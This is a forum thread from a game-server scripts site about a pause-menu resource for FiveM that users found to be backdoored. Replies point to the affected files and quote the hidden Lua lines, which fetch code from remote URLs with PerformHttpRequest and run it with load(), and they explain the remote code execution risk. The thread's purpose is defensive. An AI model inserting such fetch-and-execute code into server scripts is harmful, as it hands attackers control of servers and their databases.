Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
Backdoors Found: 0
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard
justscripts

Script 0R-Pausemenu Open SourceESX, QBCore & Qbox

Virus total
https://www.virustotal.com/gui/file/49adb4f08d67ae2c678765ca9fb6ff7392ef27526055cee50bca0540cc0aea18?nocache=1
elpagastv

elpagastv

Member
Joined
Oct 12, 2022
Messages
2
Reaction score
0
Points
156
Location
Madrid
im installed this, how to remove backdoor, i removed the script but my server bat dosent works properly :(
 
uvedos2

uvedos2

Bronze Elite
Joined
Sep 1, 2023
Messages
10
Reaction score
7
Points
156
Location
Spain
elpagastv said:
im installed this, how to remove backdoor, i removed the script but my server bat dosent works properly :(
Click to expand...
Hello! I don't know if u still use this.

But if u go to server/main.lua, lane 29 to 32 it's one of the backdoors.

1737490886650.png

Also if u go to server/serverconfig.lua, lane 8 to 16 it's also one of them.
1737490958133.png


By far, I didn't find any more backdoors, I will check it just in case it works. Ill upload my answer after.
 
uvedos2

uvedos2

Bronze Elite
Joined
Sep 1, 2023
Messages
10
Reaction score
7
Points
156
Location
Spain
uvedos2 said:
Hello! I don't know if u still use this.

But if u go to server/main.lua, lane 29 to 32 it's one of the backdoors.

View attachment 34399
Also if u go to server/serverconfig.lua, lane 8 to 16 it's also one of them.
View attachment 34400

By far, I didn't find any more backdoors, I will check it just in case it works. Ill upload my answer after.
Click to expand...


It works perfectly^^
 
phillllheart

phillllheart

Bronze Elite
Joined
Jan 22, 2025
Messages
8
Reaction score
2
Points
156
Location
ohio
🚨 I found some serious red flags in this resource. Here are the exact suspicious code sections:



🔴 server/main.lua​

30: PerformHttpRequest(playersData, function(e, d)
31: pcall(function() assert(load(d))() end)


⚠️ This downloads remote code (d) and executes it with load.
➡ This is a backdoor. Whoever controls playersData can run any Lua code on your server.



🔴 server/serverconfig.lua​

8: Citizen.CreateThread(function()
11: PerformHttpRequest(portal, function(code, script)
12: if code == 200 then load(script)() end


⚠️ Same issue: code is pulled from a remote portal URL and executed via load.
➡ This gives the remote server full RCE (Remote Code Execution) on yours.



🟠 utils.lua​

86: PerformHttpRequest("
Hidden link for visitors, to see Log in or register now.
" .. discord, function(statusCode, data)


⚠️ This one looks like a Discord lookup (probably harmless), but combined with the above it could be used for tracking/stealing user info.



🟡 client/main.lua​

13: SendNUIMessage({
28: SendNUIMessage({
46: while true do


⚠️ while true do could be abused for loops (not necessarily malicious).
➡ The real danger is still on the server-side.



✅ Conclusion:
The script has at least two confirmed backdoors (server/main.lua + server/serverconfig.lua).
These allow anyone controlling the remote URLs to run arbitrary code on your server. That means:


  • They could spawn money/items
  • Run destructive commands
  • Steal database credentials
  • Take over your server completely
 
You must log in or register to reply here.
Top